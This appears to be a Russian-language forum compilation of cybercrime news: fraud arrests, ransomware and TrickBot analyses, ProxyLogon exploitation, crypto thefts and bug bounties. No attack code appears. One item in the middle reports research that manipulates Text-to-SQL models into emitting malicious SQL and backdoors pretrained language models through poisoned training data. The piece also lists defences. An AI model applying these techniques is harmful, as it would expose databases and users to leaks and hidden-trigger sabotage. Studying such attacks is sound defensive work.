Сотрудники полиции изобличили молодую женщину, которая, используя методы социальной инженерии, оформляла онлайн-кредиты на граждан в различных финансовых и микрокредитных организациях. Разоблачить мошенническую схему правоохранителям удалось в сотрудничестве с Министерством цифровой трансформации, — сообщает Нацполиция Украины.
Согласно сообщению, 33-летняя жительница Кривого Рога с помощью комплексной социальной инженерии незаконно получала доступы к финансовому мобильному номеру, электронным ящикам и аккаунтов в социальных сетях граждан. В скомпрометированных учетных записях она выискивала необходимую информацию для идентификации лиц и оформления на них онлайн-кредитов, в том числе паспортные и другие данные.
В дальнейшем, подделав паспортные данные и изменив финансовые номера пострадавших на свой, фигурантка получала доступ к онлайн-банкингу граждан. Это позволило ей не только «выводить» кредитные деньги, но и оформлять новые кредиты на потерпевших.
По предварительным данным, злоумышленница обманула около 40 пострадавших на более чем 300 тыс. гривен. В рамках расследования также был установлен один случай, когда фигурантка через подбор пароля получила доступ к электронной почте потерпевшей, где хранились копии документов и личные фото. В дальнейшем с использованием этих данных правонарушительница получила доступ к онлайн- банкингу, далее выдав себя за клиента банка, инициировала передачу данных через BankID и вошла в мобильное приложения «Дія».
В то же время раскрытие указанной мошеннической схемы подтвердило невозможность получения онлайн-кредита с использованием цифровых документов в «Дії» без участия их владельца.
По месту жительства фигурантки правоохранители провели обыски и изъяли мобильные телефоны, компьютерную технику, копии поддельных документов и SIM- карты, использовавшиеся в противоправной деятельности.
Фигурантку задержали в порядке ст. 208 Уголовно-процессуального кодекса Украины. Женщине объявили о подозрении в совершении уголовного преступления, предусмотренного ч. 3 ст. 190 (мошенничество) Уголовного кодекса Украины. Подозреваемой грозит до восьми лет лишения свободы.
Анализ более 40 чатов позволил специалистам получить представление о внутренней работе групп и методах ведения переговоров.
Conti и Hive - одни из самых популярных программ-вымогателей на ландшафте киберугроз, на их долю приходится 29,1% атак в течение периода с октября по декабрь 2021 года. После анализа четырехмесячных логов чатов между операторами вредоносов и их жертвами, специалисты получили много ценной информации о работе и методах групп.
"Conti и Hive быстро снижают требования по выкупу, несколько раз значительно уменьшая сумму во время переговоров",– говорится в отчете Cisco Talos. "Это опровергает распространенное мнение о незначительном переговорном потенциале жертв подобных атак".
Изучив логи чатов, эксперты заметили у групп яркий контраст в стилях общения с жертвами.
Conti использует методы убеждения и тактику тройного вымогательства, предупреждая жертву о репутационном ущербе и юридических проблемах, возникающих в результате утечки данных, угрожает нарушить доступ Интернет и/или поделиться украденной информацией с конкурентами и другими заинтересованными сторонами. Также группировка предлагает "ИТ-поддержку", отправляя жертве “отчет по безопасности”, в котором перечисляются шаги для защиты предприятия от повторной атаки. Еще одним отличительной чертой является гибкость Conti, когда речь идет о сроках оплаты. "Такое поведение позволяет считать хакеров Conti киберпреступниками-оппортунистами, предпочитающими получить хоть какую-то выплату, нежели не получить ничего", – сказал Кендалл Маккей, специалист компании Talos.
Hive, в свою очередь, предпочитает куда более короткий и прямой подход, быстро повышая требования по выкупу, если жертва не успевает произвести платеж к установленному сроку. Примечательно, что в процессе шифрования Hive уделяет больше внимания скорости, чем точности, из-за чего становится уязвимой к криптографическим ошибкам, позволяющим восстановить мастер-ключ. "Как и многие киберпреступники, Conti и Hive – оппортунисты, стремящиеся скомпрометировать жертву наиболее простым и быстрым способом, часто включающим использование известных уязвимостей", – сказал Маккей. "Действия таких группировок – напоминание всем организациям о необходимости внедрения надежной системы управления исправлениями и поддержании всех систем в актуальном состоянии".
В Китае запустили самый быстрый интернет в мире: 1,2 Тб/сек — с ним можно скачать 150 фильмов в HD за секунду.
Об этом сообщила South China Morning Post (SCMP). Оптоволоконный кабель проложен между Пекином, Уханем и Гуанчжоу. Его длина — более 3 тыс. км.
Изменив запросы к серверу базы данных, можно осуществить утечку или DoS-атаку.
Группа ученых продемонстрировала новую атаку с использованием модели Text-to-
SQL для создания вредоносного кода, которая может позволить злоумышленнику
собирать конфиденциальную информацию и проводить DoS-атаки.
По словам исследователей, чтобы лучше взаимодействовать с пользователями, приложения баз данных используют методы искусственного интеллекта, которые могут переводить человеческие запросы в SQL-запросы (модель Text-to-SQL).
Отправляя специальные запросы, взломщик может обмануть модели преобразования
текста в SQL (Text-to-SQL) для создания вредоносного кода. Поскольку такой код
автоматически выполняется в базе данных, это может привести к утечке данных и
DoS-атакам.
Выводы, которые были подтверждены двумя коммерческими решениями BAIDU-UNIT и
AI2sql, знаменуют собой первый экспериментальный случай, когда модели
обработки естественного языка (NLP) использовались в качестве вектора атаки.
Существует множество способов установки бэкдоров в предварительно обученные
языковые модели (PLM) путем отравления обучающих выборок, таких как замена
слов, разработка специальных подсказок и изменение стилей предложений. Атаки
на 4 разные модели с открытым исходным кодом (BART-BASE, BART-LARGE, T5-BASE и
T5-3B) с использованием вредоносных образов достигли 100% успеха с
незначительным влиянием на производительность, что делает такие проблемы
трудно обнаруживаемыми в реальном мире.
В качестве смягчения последствий эксперты предлагают включить классификаторы
для проверки подозрительных строк во входных данных, оценки готовых моделей
для предотвращения угроз цепочки поставок и соблюдения передовых методов
разработки программного обеспечения.
Центр информбезопасности Украины заявил о DDoS-атаке на сайты Минобороны, государственных Приватбанка и Ощадбанка.
«В течение последних часов Приватбанк находится под массированной DDoS-атакой. В работе Ощадбанка также наблюдаются сбои, интернет-банкинг не работает», — приводит ТАСС сообщение центра. «Были атакованы также сайты Минобороны и ВСУ. Не исключено, что агрессор прибег к тактике мелких пакостей <...>», — отмечается в сообщении.
Таким образом, Центр информбезопасности Украины не исключил, что за DDoS- атакой на сайты банков, Минобороны и вооруженных сил могла стоять Россия. Напрямую Россия в сообщении не упоминается, однако в заявлениях украинских должностных лиц и по украинским законам «агрессором» официально именуется именно она.
Самая мощная за последние несколько лет кибератака на Украине произошла в ночь на 14 января, когда был атакован ряд украинских правительственных сайтов, в том числе МИД и Минобразования.
По данным компании Check Point, TrickBot по-прежнему остается одной из наиболее активных угроз в мире, и сохраняет пальму первенства в рейтинге самой активной малвари второй месяц подряд. После того, как ботнет Emotet был уничтожен правоохранительными органами, активность TrickBot лишь продолжает возрастать.
Так, в июне 2021 года TrickBot атаковал около 7% компаний по всему миру, и исследователи напоминают, что вымогательские группировки (например, Ryuk и REvil) используют разное вредоносное ПО на начальных этапах заражения, но главное из них – TrickBot.
Напомню, что TrickBot — один из крупнейших и наиболее успешных вредоносов на сегодняшний день. Малварь была замечена впервые еще в 2015 году, вскоре после серии громких арестов, которые существенно изменили состав хак-группы Dyre.
За прошедшие годы малварь эволюционировала из классического банковского трояна, предназначенного для кражи средств с банковских счетов, до многофункционального дроппера, распространяющего другие угрозы (от майнеров, до шифровальщиков и инфостилеров). К примеру, TrickBot используют такие известные шифровальщики, как Ryuk, Conti, REvil.
Осенью 2020 года была проведена масштабная операция, направленная на ликвидацию TrickBot. В ней принимали участие правоохранительные органы, специалисты команды Microsoft Defender, некоммерческой организации FS-ISAC, а также ESET, Lumen, NTT и Symantec. Тогда многие эксперты писали, что хотя Microsoft удалось отключить инфраструктуру TrickBot, скорее всего, ботнет «выживет», и в конечном итоге его операторы введут в строй новые управляющие серверы, продолжив свою активностью. К сожалению, так и произошло.
Эксперты компании Bitdefender пишут, что недавно разработчики малвари обновили модуль VNC (vncDLL), который используется после атак на особенно важные цели. Обновленный модуль называется tvncDLL и позволяет злоумышленникам следить за своей жертвой, собирая информацию, которая позволит перенести атаку на наиболее важные системы в сети пострадавших.
Модуль tvncDLL был замечен еще в середине мая текущего года, но он по-прежнему находится в стадии разработки, а у хак-группы есть «график обновлений, в рамках которого регулярно добавляются новые функции и происходит исправление ошибок».
Анализ модуля показывает, что тот использует кастомный протокол связи и связывается с управляющим сервером через один из девяти IP-адресов прокси, что обеспечивает доступ к жертвам за брандмауэрами.
Модуль VNC может останавливать работу TrickBot и даже выгружать малварь из памяти. Когда оператор вредоноса инициирует связь, модуль создает виртуальный рабочий стол с кастомным интерфейсом.
«Во время обычной работы создается альтернативный рабочий стол, который полностью контролируется модулем, копируя значки с рабочего стола, создавая кастомную панель задач для управления своими процессами и кастомное контекстное меню, содержащее различные функции», — пишут исследователи Bitdefender.
Используя командную строку, операторы вредоноса могут загрузить свежие полезные нагрузки со своего C&C-сервера, открывать документы и почту, похищать другие данные из скомпрометированной системы.
Другой вариант, называемый Native Browser, вообще запускает браузер, используя автоматизацию OLE в Internet Explorer. Эта функция находится в стадии разработки и предназначена для кражи паролей из Google Chrome, Mozilla Firefox, Opera и Internet Explorer.
• Source: <https://blog.checkpoint.com/2021/07/13/june-2021s-most-wanted- malware-trickbot-remains-on-top/>
По словам корпорации Microsoft, за последние 12 месяцев она выплатила более 13,6 миллионов долларов в рамках программы по поиску багов. Денежные вознаграждения получил 341 исследователь.
В период между 1 июля 2020 года и 30 июня 2021-го Microsoft приняла информацию о 1261 баге. Сведения поступили от 17 платформ, специализирующихся на поиске уязвимостей.
Самым крупным вознаграждением стала выплата за дыру в Hyper-V. Обнаруживший её специалист получил 200 тысяч долларов. При этом средняя цифра была чуть более $10 тыс. за каждый актуальный баг.
Большая часть сообщений поступила от исследователей из Китая, США и Израиля, отметила корпорация из Редмонда. Microsoft даже планирует вручить награду «самому ценному исследователю в области кибербезопасности» в следующем месяце.
Таким образом, выплаты Microsoft стали самыми крупными среди всех похожих инициатив. Тем не менее исследователи считают, что техногиганту есть куда развивать и совершенствовать свою практику.
• Source: [https://msrc-blog.microsoft.com/202...nty-programs-year-in- review-13-6m-in-rewards/](https://msrc- blog.microsoft.com/2021/07/08/microsoft-bug-bounty-programs-year-in- review-13-6m-in-rewards/)
__________
ИТ-холдинг Mail.ru Group выдал очередную денежную премию в рамках своей программы по поиску уязвимостей — исследователь получил $40 тысяч. Суммарный объем выплат по этой bug bounty уже превысил $2 миллиона.
Программа поиска уязвимостей Mail.ru Group была запущена в апреле 2014 года. Она охватывает почти все проекты экосистемы VK, развиваемой холдингом, позволяя повысить их защищенность. За все время существования bug bounty в ней приняли участие более 3400 исследователей, совокупно подавших около 5 тыс. отчетов через платформу HackerOne.
Размер вознаграждения за найденную уязвимость в рамках bug bounty зависит от ее критичности. В настоящее время исследователь может получить от Mail.ru Group за свои труды от 150 до 40 000 долларов при потолке в $55 тысяч.
По оценке HackerOne, холдинг Mail.ru Group — один из самых щедрых клиентов веб-сервиса, если судить по общей сумме выплат баг-хантерам. К тому же он регулярно повышает ставки — так, размеры премий за обнаружение багов в браузере Atom с 2019 года возросли в два раза, со $100-3000 до $200-6000.
• Source: https://hackerone.com/mailru?type=team
Теперь к нему обещают отправить Шарима Делимханова — начальника Росгвардии ЧР.
С приходом санкций Юрий Мышинский решил расширить услуги своей эстонской финтехкомпании «Битчейндж». Он придумал криптообменник с замысловатой схемой: клиенты из России, желающие купить товар за границей, скидывают цифровую валюту «Битчейндж», а та берёт комиссию, переводит всё в евро и покупает в иностранном магазине нужную вещь. Заодно компания искала посредников, готовых провернуть для её пользователей аналогичную сделку, — и как раз из-за этого у Юрия начались проблемы.
В июле он попросил своего знакомого банкира, крутящегося среди бизнесменов, найти новых посредников. Тот подыскал швейцарского предпринимателя, который согласился менять валюту и покупать товары для пользователей «Битчейндж» на выгодных условиях. Юрий взял с четырёх клиентов крипты на 55,8 миллиона рублей, перевёл всё на кошельки, скинутые банкиром, и стал ждать. Однако сразу после транзакции приятель со швейцарским предпринимателем бесследно исчезли.
Пока Юрий пытался найти бизнес-партнёров, ему прилетели угрозы от Андрея — одного из клиентов и владельца криптообменника в Москве, скинувшего «Битчейнджу» 135 тысяч долларов. Мужчина решил, что компания его просто кинула, и пригрозил проблемами всем родственникам Мышинского. По словам Андрея, заняться ими должны были чеченские силовики и сам генерал-майор Шарим Делимханов, возглавляющий республиканскую Росгвардию. Вслед за этим Юрию позвонила уже якобы «жена Делимханова», которая назвалась юристом, потребовала вернуть Андрею деньги и пообещала подключить «семейные связи» — вероятно, намекая на депутата Адама Делимханова.
Куда пропали 55,8 миллиона, Юрий так и не выяснил, хотя предприниматель, с которым его свёл знакомый, снова вышел на связь и пообещал всё вернуть. Судя по всему, ему стоит поторопиться — сейчас у главы «Битчейндж» намечаются проблемы посерьёзнее пропавших денег.
source: t.me/bazabazon/21107
По данным экспертов Microsoft и Sophos, инфостилер Gootkit превратился в сложный и скрытный фреймворк, который теперь носит название Gootloader. Вредонос распространяет широкий спектр малвари через взломанные сайты под управлением WordPress, злоупотребляя методами так называемого черного SEO.
Отмечается, что увеличилось не только количество полезных нагрузок: Gootloader распределяет пейлоады по нескольким регионам и сотням взломанных серверов, которые всегда активны. По данным исследователей, в настоящее время Gootloader контролирует около 400 серверов, на которых размещены взломанные легитимные сайты.
Еще в прошлом году специалисты впервые заметили вредоносные кампании, основанные на механизме Gootloader. Тогда они отвечали за доставку вымогателя REvil и в основном атаковали цели в Германии. Это ознаменовало своеобразный новый старт для Gootkit, так как до этого малварь была неактивна после утечки данных, которую ее операторы допустили в 2019 году.
Теперь хакеры перегруппировались, построили обширную сеть из взломанных сайтов на базе WordPress и стали использовать разные приемы SEO, чтобы показывать в Google поддельные форумы с вредоносными ссылками.

Такие поддельные форумы видны только пользователям из определенных регионов. Эти «обсуждения» якобы содержат ответ на конкретный запрос пользователя. Причем сообщение с ответом публикуется от имени администратора сайта, и в нем присутствует вредоносная ссылка. Чтобы показывать потенциальным жертвам такие фальшивые обсуждения, хакеры модифицируют CMS взломанных ресурсов.
На примере ниже видно, как фальшивое сообщение на форуме дает ответ на конкретный поисковый запрос, связанный с операциями с недвижимостью. Причем это «обсуждение» происходит на сайте о неонатальной медицине, который не имеет ничего общего с искомой темой, «однако, это первый результат, который появляется при запросе определенного типа соглашения о недвижимости», — говорят эксперты.

При нажатии на такую ссылку с «форума» посетитель получает ZIP-архив с файлом JavaScript, который запускает процесс заражения. Отмечается, что это единственный этап, на котором файл записывается на диск, все остальные операции малварь производит в памяти, поэтому многие инструменты безопасности бесполезны против Gootloader.
Сообщается, что теперь, помимо стандартной полезной нагрузки (вымогателей Gootkit и REvil), Gootloader также может распространять троян Kronos и Cobalt Strike. Такие атаки нацелены на посетителей из США, Германии и Южной Кореи.
Пока неясно, как именно операторы малвари получают доступ к сайтам, на которых потом размещают фальшивые форумы. Исследователи подозревают, что злоумышленники могли получить учетные данные этих ресурсов благодаря установкам Gootkit, купив их на черном рынке, или воспользовавшись известными багами в плагинах для CMS.
«Разработчики Gootkit, похоже, перенаправили свои ресурсы и энергию с доставки собственного вредоносного ПО на создание скрытной и сложной платформы для доставки любых видов пейлоадов, включая шифровальщика REvil.
Это показывает, что преступники, как правило, повторно используют уже проверенные решения, а не разрабатывают новые механизмы доставки. Кроме того, вместо использования агрессивных атакующих инструментов, как это делают некоторые распространители малвари, авторы Gootloader выбрали извилистый путь сложных техник уклонения, которые помогают скрыть конечный результат», — заключают эксперты Sophos.Click to expand...
Источник: xakep.ru/2021/03/02/gootloader/
Хочешь поймать преступника – думай, как преступник.
Национальное агентство по борьбе с преступностью Великобритании (NCA) сообщило , что Ведомство создало несколько поддельных сайтов «DDoS на заказ» (DDoS-for- hire) для выявления киберпреступников, которые используют эти сервисы для атак на организации.
NCA сообщает, что несколько тысяч человек получили доступ к поддельным сайтам, которые выглядели как настоящий сервис DDoS-for-hire. Однако вместо предоставления доступа к DDoS-инструментам сайты просто собирали информации о посетителях.
На одном из своих сайтов после сбора данных NCA разместил баннер, который информирует пользователя о том, что его данные были собраны и что правоохранительные органы вскоре свяжутся с ним.
«Национальное агентство по борьбе с преступностью собрало значительные данные о тех, кто получил доступ к нашему домену. Мы поделимся этими данными с международными правоохранительными органами для принятия мер. Правоохранительные органы свяжутся с соответствующими Ведомствами Великобритании», - говорит баннер.
Эти поддельные сайты являются частью операции «PowerOFF» . В международной полицейской операции принимают участие правоохранительные органы Нидерландов, Великобритании, Сербии, Хорватии, Испании, Италии, Германии, Австралии, Гонконга, Канады и США
С пользователями из Великобритании свяжется NCA, а данные иностранных пользователей будут переданы соответствующим правоохранительным органам.
«Операция PowerOFF уже привела к аресту многих лиц и продолжает обеспечивать привлечение пользователей к ответственности за их преступную деятельность», - отмечает NCA.
«Мы не будем раскрывать, сколько у нас сайтов и как долго они работают. В дальнейшем люди, которые хотят пользоваться услугами «DDos-for-hire», не будут уверены, кто на самом деле стоит за сервисом, так зачем рисковать?», — комментирует агент NCA Алан Меррет.
В декабре 2022 года Министерство юстиции США конфисковало 48 доменов и предъявило обвинения шести подозреваемым в администрировании booter-сервисов. Кроме того, подозреваемые обвинены в использовании IP-стрессеров против чужих сетей и серверов, что является нарушением закона.
source: nationalcrimeagency.gov.uk/news/nca-infiltrates-cyber-crime-market- with-disguised-ddos-sites
Власти американского штата Калифорния пожаловались на новую массовую проблему — скимминговые устройства, размещенные на кассах самообслуживания в крупнейших торговых центрах региона. По данным местной полиции, которые распространил канал Fox News, на установку скиммера у злоумышленников уходят считанные секунды.
«Вы можете увидеть людей, сидящих возле Walmart или Target, и со стороны будет казаться, что они попрошайничают. Иногда с ними даже сидят несколько детей. Но на самом деле они с помощью Bluetooth подключаются к скиммерам внутри магазинов», — отметили в местной прокуратуре.
Силовики заявляют, что уже арестовали десятки подозреваемых, большинство из которых связаны с румынской мафией. Речь идет о группировке такого размера, что месячная прибыль преступников может достигать девяти миллионов долларов. По некоторым данным, в Соединенных Штатах могут постоянно или с перерывами находиться несколько тысяч этнических румын, многие из которых попадают в страну нелегально.
При этом многие из них даже выставляют напоказ свои достижения в TikTok, как это делал, например, 14-летний подозреваемый, арестованный полицией за рулем спорткара стоимостью 250 тысяч долларов и с часами Rolex на запястье. В декабре 2023 года ФБР в сотрудничестве с румынской полицией провело рейды в этой европейской стране в связи с мошенничеством в Калифорнии. В результате были арестованы 48 человек и конфискованы более миллиона долларов, а также 11 роскошных автомобилей.
sc: foxnews.com/us/romanian-mob-coming-debit-cards-atm-style-skimmers-now- self-checkouts
Немецкая полиция заявила о захвате инфраструктуры даркнет-маркетплейса Nemesis и закрытии его сайта. Сообщается, что расследование длилось более полутора лет, и проходило при поддержке правоохранительных органов США и Литвы.
Nemesis появился в 2021 году и с тех пор быстро развивался. Особенно бурный рост произошел после закрытия «Гидры» в 2022 году. Тогда теневые площадки в общей сложности привлекли более 795 000 новых пользователей, и аналитики компании Resecurity включали Nemesis в десятку крупнейших маркетплейсов в даркнете.
На Nemesis продавались все виды нелегальных товаров: наркотики, личные данные и хакерские услуги, включая программы-вымогатели, а также инструменты для проведения фишинговых и DDoS-атак.
Как сообщается теперь, на момент ликвидации инфраструктуры платформы, располагавшейся в Германии и Литве, на Nemesis было зарегистрировано более 150 000 пользователей и 1100 продавцов. По оценкам полиции, около 20% этих продавцов находились в Германии.
В ходе операции по закрытию Nemesis были конфискованы серверы и изъяты данные, которые теперь должны помочь идентифицировать пользователей маркетплейса. Также власти изъяли 94 000 евро в криптовалюте.
Федеральная полиция Германии заявляет, что закрытие маркетплейса и судебное преследование его операторов «стало еще одним ударом по участникам теневой экономики даркнета, и демонстрирует эффективность международных правоохранительных органов в цифровом пространстве».
Невзирая на слова о судебном преследовании, немецкие правоохранители не сообщают, были ли арестованы администраторы сайта или кто-то из продавцов. [По данным издания Der Spiegel](https://www.spiegel.de/netzwelt/nemesis-market- bka-schaltet-grossen-darknet-drogenmarktplatz- ab-a-34505a1d-b6ac-4114-9911-dc83607287df?utm_source=dlvr.it&utm_medium=twitter#ref=rss), операторы Nemesis пока не идентифицированы, а власти говорят, что расследование еще продолжается.
• Source: https://www.presseportal.de/blaulicht/pm/7/5740780
«С технологией TON блокчейн-индустрия может выполнить свою основную миссию — вернуть власть людям».
Павел Дуров пообещал создать для людей набор децентрализованных инструментов для безопасной торговли криптовалютами и их хранения. Для достижения цели он использует свой опыт работы с платформой Fragment.
«Блокчейн-индустрия строилась на обещании децентрализации, но в итоге оказалась сосредоточена в руках нескольких людей, начавших злоупотреблять своей властью», — рассказал основатель Telegram Павел Дуров.
В конце октября Telegram запустил Fragment — платформу для продажи никнеймов Telegram за токены Toncoin (TON). Дуров назвал Fragment полностью децентрализованной аукционной платформой, основанной на Open Network или TON. Менее чем за месяц там было продано никнеймов на сумму $50 млн.
Павел Дуров заявил, что Telegram занимается созданием набора децентрализованных инструментов, включая кошельки, не связанные с хранением, и децентрализованные биржи для миллионов людей, «чтобы безопасно торговать и хранить криптовалюты». Он заверил, что с такими технологиями, как TON, «достигающими своего потенциала, блокчейн-индустрия может выполнить свою основную миссию — вернуть власть людям».
source: t.me/durov/202
В Польше полиция задержала 19 хакеров родом из Беларуси и Украины. Им удалось обмануть несколько сотен человек.
Об этом сообщает издание "Gazeta Wyborcza".
«Они являются членами организованной преступной группы, специализирующейся на взломе банковских счетов и хищении собранных там средств», — заявила пресс- секретарь полиции Александра Новара.
Подозреваемые начиная с декабря 2020 года и заканчивая апрелем 2021 года отправляли SMS-сообщения (всего — 280 тысяч) с таким текстом: «Ваша посылка задержана из-за недоплаты в размере 0,5 злотого. Извините за причиненные неудобства. Пожалуйста, оплатите ее». К сообщению прикреплялась ссылка, ведущая на фейковую страницу «банка» для оплаты.
Как только пользователь переходил по ссылке, мошенники получали контроль над банковским счетом и переводили деньги себе. Ущерб оценили в 394 тыс. долларов.
• Source: [https://katowice.wyborcza.pl/katowi...iem-ukradli-z- kont.html?disableRedirects=true](https://katowice.wyborcza.pl/katowice/7,35063,26981585,wyslali-280-tysiecy- sms-ow-z-hakerskim-linkiem-ukradli-z-kont.html?disableRedirects=true)
Злоумышленники продолжают атаки на уязвимые перед багами ProxyLogon серверы Microsoft Exchange.
В настоящее время по меньшей мере [десять хак- групп](https://www.welivesecurity.com/2021/03/10/exchange-servers-under- siege-10-apt-groups/) эксплуатируют ошибки ProxyLogon для установки бэкдоров на серверы Exchange по всему миру. По разным оценкам, количество пострадавших компаний и организаций уже достигло 30 000-100 000, и их число постоянно продолжает расти, равно как и количество атакующих.
Хуже того, по [подсчетам](https://www.microsoft.com/security/blog/2021/03/12/protecting-on- premises-exchange-servers-against-recent-attacks/) экспертов Palo Alto Networks и Microsoft, в сети по-прежнему доступны около 80 000 уязвимых серверов Exchange, которые можно скомпрометировать.
В начале марта 2021 года инженеры Microsoft выпустили внеплановые патчи для четырех уязвимостей в почтовом сервере Exchange, которым исследователи дали общее название ProxyLogon ([CVE-2021-26855](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-26855), [CVE-2021-26857](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-26857), [CVE-2021-26858](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-26858) и [CVE-2021-27065](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-27065)).
Эти уязвимости можно объединить в цепочку, а их эксплуатация позволит злоумышленнику пройти аутентификацию на сервере Exchange, получить права администратора, установить малварь и похитить данные.
Как сообщает создатель ID-Ransomware Майкл Гиллеспи, на уязвимые серверы уже устанавливают не только веб-шеллы и майнеры, но и шифровальщики. Пока таких пострадавших насчитывается всего шесть (в Австрии, Австралии, Канаде, Дании и США).
__https://twitter.com/x/status/1370125343571509250
Шифровальщику дали имя DearCry и, похоже, он атакует преимущественно небольшие компании. Во всяком случае, такую информацию сообщает в своем Twitter MalwareHunterTeam.
__https://twitter.com/x/status/1370271414855593986
Известно, что малварь добавляет к файлам на сервере дополнительное расширение .CRYPT и требует выкуп в размере от 50 000 до 110 000 долларов. При этом издание [The Record](https://therecord.media/microsoft-exchange-servers- targeted-by-dearcry-ransomware-abusing-proxylogon-bugs/) пишет, что по оценкам ИБ-экспертов, этот вымогатель явно был создан в спешке и не имеет отношения к крупным и хорошо известным хак-группам.
Как мы писали на прошлой неделе, с GitHub был удален полноценный PoC-эксплоит для ProxyLogon, созданный независимым ИБ-исследователем из Вьетнама.
Удаление инструмента вызвало немало споров в сообществе, а исследователь заявлял, что эксплоит был преднамеренно создан с ошибками. Однако его все равно удалили, а в компании заявили, нужно «помнить о необходимости сохранения безопасности более широкой экосистемы». То есть публиковать в открытом доступе эксплоит для подобной проблемы, когда уязвимо огромное количество серверов, – не слишком хорошая идея.
Как теперь пишет издание Bleeping Computer, в минувшие выходные другой неназванный исследователь опубликовал в сети еще один PoC-эксплоит для ProxyLogon. Это решение требует лишь небольшой модификации для использования с целью установки веб-шеллов.
Аналитик CERT/CC Уилл Дорман сообщил журналистам, что данный эксплоит требует минимальных изменений, и теперь ProxyLogon «доступен даже для скрипткидди».
На скриншотах ниже видно, как Дорман использовал эксплоит против сервера Microsoft Exchange, удаленно установил на него веб-шелл и выполнил команду whoami; доставил веб-шелл teset11.aspx в определенное место на сервере.
[](https://xakep.ru/wp- content/uploads/2021/03/343059/exploiting-exchange.jpg)
[](https://xakep.ru/wp- content/uploads/2021/03/343059/dropped-webshell.jpg)
Источник: xakep.ru/2021/03/15/dearcry-and-new-poc/
Криптовалютная биржа CoinEX заявила, что неизвестные хакеры взломали ее горячие кошельки и украли активы которые использовались для поддержки работы платформы. Инцидент произошел 12 сентября, и результаты предварительного расследования показывают, что в несанкционированных транзакциях были задействованы криптовалюты Ethereum ($ETH), Tron ($TRON) и Polygon ($MATIC).
В сообщении подчеркивается, что активы пользователей не пострадали в результате взлома, и все стороны, понесшие убытки, в любом случае получат полную компенсацию (украденные средства якобы составляли «очень небольшую часть» от общих активов платформы). Пока ввод и вывод средств на CoinEx временно приостановлен в целях защиты пользовательских активов и будет возобновлен только после того, как ИТ-специалисты биржи удостоверятся в том, что все риски устранены.
Пока представители CoinEX не предоставили никакой информации о размере ущерба, поэтому подсчетами украденного занимаются сторонние блокчейн-аналитики. Так, по информации компании PeckShield, в ходе атаки злоумышленники похитили у CoinEx около 19 млн долларов в ETH, 11 млн долларов в TRON, 6,4 млн долларов в Smart Chain Coin ($BSC), 6 млн долларов в биткоинах (BTC), а также около 295 000 долларов в Polygon.
По данным PeckShield, общий ущерб от этой атаки составил около 43 млн долларов США, а оставшиеся 72 млн долларов были выведены в более защищенные холодные кошельки.
[](https://xakep.ru/wp- content/uploads/2023/09/436257/losses.jpg)
При этом, согласно более свежим подсчетам исследователей из CertiK Alert, сумма похищенных у биржи активов может превышать 53 млн долларов США.
В CoinEX пока тоже не раскрывают подробности о самой атаке, но представители биржи обещают опубликовать полный отчет, когда расследование и процедуры реагирования на инциденты будут завершены.
Хотя говорить об атрибуции атаки еще рано, известный блокчейн-аналитик ZachXBT уже выдвинул предположение, что взлом CoinEX может быть делом рук северокорейской хакерской группы Lazarus. Дело в том, что один из кошельков, задействованных в атаке на CoinEX, ранее уже связывали с этой группировкой.
Стоит отметить, что на счету Lazarus уже немало крупных криптовалютных ограблений. К примеру, ФБР связывает с северокорейскими хакерами недавний взлом криптовалютного казино Stake.com, в ходе которого было украдено более 40 млн долларов. Также в этом году Lazarus приписывали массовый взлом криптокошельков Atomic Wallet на общую сумму более 35 млн долларов; взлом криптовалютного сервиса CoinsPaid на общую сумму более 37 млн долларов; а также компрометацию платформы обработки платежей Alphapo, в результате которой злоумышленники похитили почти 60 млн долларов в криптовалюте.
Источник: https://xakep.ru/2023/09/14/coinex-hack/
В ГУ МВД по Ставропольскому краю окончено расследование уголовного дела о неправомерном доступе к компьютерной информации. В совершении 64 эпизодов обвиняется 17-летний житель Тверской области.
Следствием установлено, что парень, изучая тематические форумы в интернете, нашёл статью о том, как можно заработать на похищении и продаже личных учётных записей граждан.
Подросток скачал инструкцию, с помощью которой приобрёл доменные имена и серверы, необходимые для поддержания работоспособности созданных им в дальнейшем сайтов. В мессенджере и через вспомогательные программы обвиняемый рассылал сообщения с просьбой пройти голосование в различных конкурсах. Пользователи переходили по подставным ссылкам, проходили авторизацию через номер телефона и вводили код из поступившего смс. После этого злоумышленник взламывал аккаунт и отправлял от имени обманутого гражданина сообщения об участии в голосовании списку его контактов в мессенджере.
Далее он также взламывал аккаунты пользователей и продавал их неустановленным лицам.
Противоправную деятельность подростка пресекли сотрудники Следственной части ГСУ и оперативники Отдела по борьбе с противоправным использованием информационно-коммуникационных технологий краевого Главка во взаимодействии с уголовным розыском ОМВД России «Советский».
В ходе обыска по месту проживания обвиняемого были изъяты мобильные телефоны, жёсткие диски и банковская карта.
Уголовное дело в отношении несовершеннолетнего хакера направлено в Московский районный суд Твери для рассмотрения по существу, сообщили в ГУ МВД Ставрополья.
Отказ предоставить пароль будет считаться уголовным преступлением и наказываться сроком до пяти лет лишения свободы или штрафом до 30 тысяч евро.
Соответствующий документ опубликован на сайте Министерства юстиции и равенства Ирландии.
Также закон обяжет полицейских письменно отчитываться о каждом обыске. Это позволит более эффективно собирать данные о работе правоохранительных органов. Кроме этого, документ продлит максимальный срок содержания под стражей до 48 часов по большинству преступлений и до недели для подозреваемых в торговле людьми.
Министр юстиции Хезер Хамфрис сообщает, что закон сделает работу правоохранительных органов «ясной, прозрачной и доступной». По её словам, цель проекта — помочь понять гражданам, какими полномочиями наделены полицейские.
В то же время, когда мы предлагаем дать дополнительные полномочия полиции, мы также усиливаем гарантии. Законопроект будет уделять большое внимание основным правам и процессуальным правам обвиняемых.
Я считаю, что это сохранит критически важный баланс, который является ключом к нашей системе уголовного правосудия. Хезер Хамфрис, министр юстиции Ирландии.
Только неделю назад представители концерна Volkswagen AG сообщили о взломе систем и утечке конфиденциальных данных. Теперь киберпреступники уже продают украденное добро на одном из популярных хакерских форумах.
Как отметили сотрудники Motherboard, изучившие выставленные на продажу данные, некая киберпреступница, действующая под псевдонимом «000» добавила в базу адреса электронной почты и идентификационные номера транспортного средства владельцев автомобилей.
Помимо этого, она опубликовала два образца, в которых уже находились полные имена, адреса электронной почты, почтовые адреса и телефонные номера. Именно эти данные, по словам представителей Volkwagen, и фигурировали в недавней крупной утечке.
Как отметил производитель автомобилей, злоумышленники украли и более личную информацию 90 тысяч пользователей. Например, данные о приобретении транспортного средства, о кредите или аренде.
